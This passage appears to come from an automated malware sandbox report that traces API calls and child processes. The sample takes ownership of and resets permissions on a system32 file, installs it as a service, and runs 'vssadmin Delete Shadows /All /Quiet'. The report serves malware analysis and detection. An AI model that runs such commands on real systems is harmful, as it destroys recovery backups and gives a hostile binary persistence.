lpCurrentDirectory=0x0, lpStartupInfo=0x18feb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fefc | out: lpCommandLine="C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Pipe.exe", lpProcessInformation=0x18fefc*(hProcess=0x98, hThread=0x9c, dwProcessId=0xbb0, dwThreadId=0xac0)) returned 1 [0065.964] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0066.510] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x18ff2c | out: lpExitCode=0x18ff2c*=0x0) returned 1 [0066.510] CloseHandle (hObject=0x9c) returned 1 [0066.510] CloseHandle (hObject=0x98) returned 1 [0066.510] _snwprintf (in: _Dest=0x35b078, _Count=0x120, _Format="icacls.exe %s /reset" | out: _Dest="icacls.exe C:\\Windows\\system32\\Pipe.exe /reset") returned 46 [0066.511] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Pipe.exe /reset", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18feb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fefc | out: lpCommandLine="C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Pipe.exe /reset", lpProcessInformation=0x18fefc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xa0c, dwThreadId=0xa5c)) returned 1 [0066.519] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0066.738] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x18ff2c | out: lpExitCode=0x18ff2c*=0x0) returned 1 [0066.739] CloseHandle (hObject=0x98) returned 1 [0066.739] CloseHandle (hObject=0x9c) returned 1 [0066.739] lstrlenW (lpString="C:\\Windows\\system32\\Pipe.exe") returned 28 [0066.739] lstrlenW (lpString="") returned 0 [0066.739] lstrlenW (lpString="-s") returned 2 [0066.739] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x42) returned 0x35ba88 [0066.739] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x2) returned 0x35e0e0 [0066.742] CreateServiceW (in: hSCManager=0x35e0e0, lpServiceName="Pipe", lpDisplayName="Pipe", dwDesiredAccess=0xf01ff, dwServiceType=0x10, dwStartType=0x3, dwErrorControl=0x0, lpBinaryPathName="C:\\Windows\\system32\\Pipe.exe -s", lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x35ad38 [0066.802] StartServiceW (hService=0x35ad38, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 1 [0068.940] Sleep (dwMilliseconds=0x64) [0069.342] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0069.343] ControlService (in: hService=0x35ad38, dwControl=0x1, lpServiceStatus=0x18fee4 | out: lpServiceStatus=0x18fee4*(dwServiceType=0x10, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0069.346] Sleep (dwMilliseconds=0x3e8) [0071.025] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0071.026] Sleep (dwMilliseconds=0x3e8) [0072.074] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0072.074] Sleep (dwMilliseconds=0x3e8) [0073.250] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0073.251] Sleep (dwMilliseconds=0x3e8) [0074.747] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0074.748] Sleep (dwMilliseconds=0x3e8) [0076.229] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0076.230] Sleep (dwMilliseconds=0x3e8) [0077.419] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0077.420] Sleep (dwMilliseconds=0x3e8) [0079.184] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0079.184] Sleep (dwMilliseconds=0x3e8) [0080.214] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0080.215] Sleep (dwMilliseconds=0x3e8) [0081.272] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0081.273] Sleep (dwMilliseconds=0x3e8) [0082.338] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0082.340] Sleep (dwMilliseconds=0x3e8) [0083.456] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0083.457] Sleep (dwMilliseconds=0x3e8) [0084.477] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0084.479] Sleep (dwMilliseconds=0x3e8) [0085.486] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0085.486] Sleep (dwMilliseconds=0x3e8) [0086.501] QueryServiceStatusEx (in: hService=0x35ad38, InfoLevel=0x0, lpBuffer=0x18fee4, cbBufSize=0x24, pcbBytesNeeded=0x18ff1c | out: lpBuffer=0x18fee4, pcbBytesNeeded=0x18ff1c) returned 1 [0086.502] Sleep (dwMilliseconds=0x3e8) Thread: id = 36 os_tid = 0xb68 Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4bd6f000" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa80" cmd_line = "C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x31c Thread: id = 4 os_tid = 0x484 Thread: id = 5 os_tid = 0x410 Thread: id = 6 os_tid = 0x774 Thread: id = 7 os_tid = 0x7e8 Process: id = "4" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4b827000" os_pid = "0x7a4" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005a720" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 8 os_tid = 0xb30 Thread: id = 9 os_tid = 0xb28 [0033.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe6dc20 | out: lpSystemTimeAsFileTime=0xe6dc20*(dwLowDateTime=0xb7ba9a00, dwHighDateTime=0x1d64ac6)) [0033.526] GetCurrentProcessId () returned 0x7a4 [0033.526] GetCurrentThreadId () returned 0xb28 [0033.526] GetTickCount () returned 0x1143a05 [0033.526] QueryPerformanceCounter (in: lpPerformanceCount=0xe6dc28 | out: lpPerformanceCount=0xe6dc28*=15427134502) returned 1 [0033.526] malloc (_Size=0x100) returned 0x128e80 Thread: id = 10 os_tid = 0x5dc Thread: id = 11 os_tid = 0x518 Thread: id = 12 os_tid = 0x51c Thread: id = 13 os_tid = 0xb2c Thread: id = 14 os_tid = 0xb08 Thread: id = 28 os_tid = 0xb48 Thread: id = 35 os_tid = 0xb60 Thread: id = 39 os_tid = 0xa68 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 15 os_tid = 0xa94 Thread: id = 16 os_tid = 0x768 Thread: id = 17 os_tid = 0x764 Thread: id = 18 os_tid = 0x758 Thread: id = 19 os_tid = 0x724 Thread: id = 20 os_tid = 0x718 Thread: id = 21 os_tid = 0x714 Thread: id = 22 os_tid = 0x630 Thread: id = 23 os_tid = 0x154 Thread: id = 24 os_tid = 0x150 Thread: id = 25 os_tid = 0x120 Thread: id = 26 os_tid = 0x118 Thread: id = 27 os_tid = 0xf0 Thread: id = 38 os_tid = 0x7ac Thread: id = 364 os_tid = 0x8a8 Thread: id = 376 os_tid = 0xcc Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c12c000" os_pid = "0xb04" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005ab70" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 29 os_tid = 0xb4c Thread: id = 30 os_tid = 0xb54 Thread: id = 31 os_tid = 0xb5c Thread: id = 32 os_tid = 0xb58 Thread: id = 33 os_tid = 0xb50 Thread: id = 34 os_tid = 0x55c Thread: id = 40 os_tid = 0xa6c Process: id = "7" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x38c8a000" os_pid = "0xbb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa80" cmd_line = "C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Pipe.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 41 os_tid = 0xac0 Process: id = "8" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x38c90000" os_pid = "0xa0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa80" cmd_line = "C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Pipe.exe /reset" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 42 os_tid = 0xa5c Process: id = "9" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 43 os_tid = 0x308 Thread: id = 44 os_tid = 0x580 Thread: id = 45 os_tid = 0x878 Thread: id = 46 os_tid = 0xb34 Thread: id = 47 os_tid = 0xb38 Thread: id = 48 os_tid = 0xb44 Thread: id = 49 os_tid = 0xa5c Thread: id = 50 os_tid = 0xbc Thread: id = 51 os_tid = 0xd0 Thread: id = 52 os_tid = 0x1c Thread: id = 53 os_tid = 0x568 Thread: id = 54 os_tid = 0x18 Thread: id = 55 os_tid = 0x5a8 Thread: id = 56 os_tid = 0x50 Thread: id = 57 os_tid = 0x7c Thread: id = 58 os_tid = 0x60 Thread: id = 59 os_tid = 0xd4 Thread: id = 60 os_tid = 0x328 Thread: id = 61 os_tid = 0x340 Thread: id = 62 os_tid = 0xa0 Thread: id = 63 os_tid = 0x650 Thread: id = 64 os_tid = 0x468 Thread: id = 65 os_tid = 0x584 Thread: id = 66 os_tid = 0x0 Thread: id = 67 os_tid = 0x648 Thread: id = 68 os_tid = 0x54c Thread: id = 69 os_tid = 0x570 Thread: id = 70 os_tid = 0x20 Thread: id = 71 os_tid = 0x474 Thread: id = 72 os_tid = 0x7f8 Thread: id = 73 os_tid = 0xf8 Thread: id = 74 os_tid = 0x24 Thread: id = 75 os_tid = 0x6f8 Thread: id = 76 os_tid = 0x6e4 Thread: id = 77 os_tid = 0x6d4 Thread: id = 78 os_tid = 0x6c4 Thread: id = 79 os_tid = 0x6b4 Thread: id = 80 os_tid = 0x6ac Thread: id = 81 os_tid = 0x84 Thread: id = 82 os_tid = 0x650 Thread: id = 83 os_tid = 0x590 Thread: id = 84 os_tid = 0x94 Thread: id = 85 os_tid = 0x488 Thread: id = 86 os_tid = 0x470 Thread: id = 87 os_tid = 0x68 Thread: id = 88 os_tid = 0x138 Thread: id = 89 os_tid = 0x3d8 Thread: id = 90 os_tid = 0x9c Thread: id = 91 os_tid = 0x88 Thread: id = 92 os_tid = 0x8c Thread: id = 93 os_tid = 0x5c Thread: id = 94 os_tid = 0x78 Thread: id = 95 os_tid = 0x308 Thread: id = 96 os_tid = 0x28c Thread: id = 97 os_tid = 0x74 Thread: id = 98 os_tid = 0x98 Thread: id = 99 os_tid = 0x34 Thread: id = 100 os_tid = 0x100 Thread: id = 101 os_tid = 0x198 Thread: id = 102 os_tid = 0x80 Thread: id = 103 os_tid = 0x158 Thread: id = 104 os_tid = 0x154 Thread: id = 105 os_tid = 0x150 Thread: id = 106 os_tid = 0x120 Thread: id = 107 os_tid = 0x90 Thread: id = 108 os_tid = 0x4c Thread: id = 109 os_tid = 0x130 Thread: id = 110 os_tid = 0x128 Thread: id = 111 os_tid = 0x124 Thread: id = 112 os_tid = 0x11c Thread: id = 113 os_tid = 0x118 Thread: id = 114 os_tid = 0xc4 Thread: id = 115 os_tid = 0x44 Thread: id = 116 os_tid = 0x28 Thread: id = 117 os_tid = 0x40 Thread: id = 118 os_tid = 0x2c Thread: id = 119 os_tid = 0x48 Thread: id = 120 os_tid = 0x38 Thread: id = 121 os_tid = 0xb8 Thread: id = 122 os_tid = 0x3c Thread: id = 123 os_tid = 0xc0 Thread: id = 124 os_tid = 0xb0 Thread: id = 125 os_tid = 0x30 Thread: id = 126 os_tid = 0x8 Thread: id = 333 os_tid = 0x478 Thread: id = 352 os_tid = 0x700 Thread: id = 365 os_tid = 0x9d8 Thread: id = 374 os_tid = 0x54 Process: id = "10" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1bb25000" os_pid = "0x1d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 127 os_tid = 0x40c Thread: id = 128 os_tid = 0xb9c Thread: id = 129 os_tid = 0xb98 Thread: id = 130 os_tid = 0xb8c Thread: id = 131 os_tid = 0xb88 Thread: id = 132 os_tid = 0x4e8 Thread: id = 133 os_tid = 0x4dc Thread: id = 134 os_tid = 0x4d0 Thread: id = 135 os_tid = 0x378 Thread: id = 136 os_tid = 0x288 Thread: id = 137 os_tid = 0x24c Thread: id = 138 os_tid = 0x238 Thread: id = 139 os_tid = 0x234 Thread: id = 140 os_tid = 0x228 Thread: id = 141 os_tid = 0x224 Thread: id = 142 os_tid = 0x220 Thread: id = 143 os_tid = 0x21c Thread: id = 366 os_tid = 0xa08 Thread: id = 404 os_tid = 0xa0c Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xccc3000" os_pid = "0x250" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e7a" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 144 os_tid = 0x81c Thread: id = 145 os_tid = 0x708 Thread: id = 146 os_tid = 0x690 Thread: id = 147 os_tid = 0x2a0 Thread: id = 148 os_tid = 0x29c Thread: id = 149 os_tid = 0x284 Thread: id = 150 os_tid = 0x280 Thread: id = 151 os_tid = 0x27c Thread: id = 152 os_tid = 0x278 Thread: id = 153 os_tid = 0x274 Thread: id = 154 os_tid = 0x268 Thread: id = 155 os_tid = 0x260 Thread: id = 156 os_tid = 0x254 Thread: id = 370 os_tid = 0xa38 Thread: id = 389 os_tid = 0x484 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1a2ff000" os_pid = "0x294" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b49c" [0xc000000f], "LOCAL" [0x7] Thread: id = 157 os_tid = 0x728 Thread: id = 158 os_tid = 0x3f8 Thread: id = 159 os_tid = 0x2c0 Thread: id = 160 os_tid = 0x2bc Thread: id = 161 os_tid = 0x2b8 Thread: id = 162 os_tid = 0x2b4 Thread: id = 163 os_tid = 0x2ac Thread: id = 164 os_tid = 0x2a4 Thread: id = 165 os_tid = 0x298 Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 166 os_tid = 0x828 Thread: id = 167 os_tid = 0x3b4 Thread: id = 168 os_tid = 0xa88 Thread: id = 169 os_tid = 0x6f0 Thread: id = 170 os_tid = 0x6f4 Thread: id = 171 os_tid = 0x5f8 Thread: id = 172 os_tid = 0x5f0 Thread: id = 173 os_tid = 0x5ec Thread: id = 174 os_tid = 0x5d0 Thread: id = 175 os_tid = 0x12c Thread: id = 176 os_tid = 0x170 Thread: id = 177 os_tid = 0x3c0 Thread: id = 178 os_tid = 0x3b8 Thread: id = 179 os_tid = 0x3a8 Thread: id = 180 os_tid = 0x2fc Thread: id = 181 os_tid = 0x2f8 Thread: id = 182 os_tid = 0x2e4 Thread: id = 183 os_tid = 0x2dc Thread: id = 184 os_tid = 0x2d4 Thread: id = 185 os_tid = 0x2cc Thread: id = 363 os_tid = 0x888 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 186 os_tid = 0x640 Thread: id = 187 os_tid = 0x330 Thread: id = 188 os_tid = 0x638 Thread: id = 189 os_tid = 0x554 Thread: id = 190 os_tid = 0x748 Thread: id = 191 os_tid = 0x72c Thread: id = 192 os_tid = 0x720 Thread: id = 193 os_tid = 0x668 Thread: id = 194 os_tid = 0x65c Thread: id = 195 os_tid = 0x144 Thread: id = 196 os_tid = 0x110 Thread: id = 197 os_tid = 0x3f0 Thread: id = 198 os_tid = 0x3ec Thread: id = 199 os_tid = 0x3e4 Thread: id = 200 os_tid = 0x3e0 Thread: id = 201 os_tid = 0x3d0 Thread: id = 202 os_tid = 0x3cc Thread: id = 203 os_tid = 0x398 Thread: id = 204 os_tid = 0x394 Thread: id = 205 os_tid = 0x384 Thread: id = 206 os_tid = 0x380 Thread: id = 207 os_tid = 0x368 Thread: id = 208 os_tid = 0x350 Thread: id = 209 os_tid = 0x33c Thread: id = 378 os_tid = 0xd4 Thread: id = 379 os_tid = 0xd8 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT 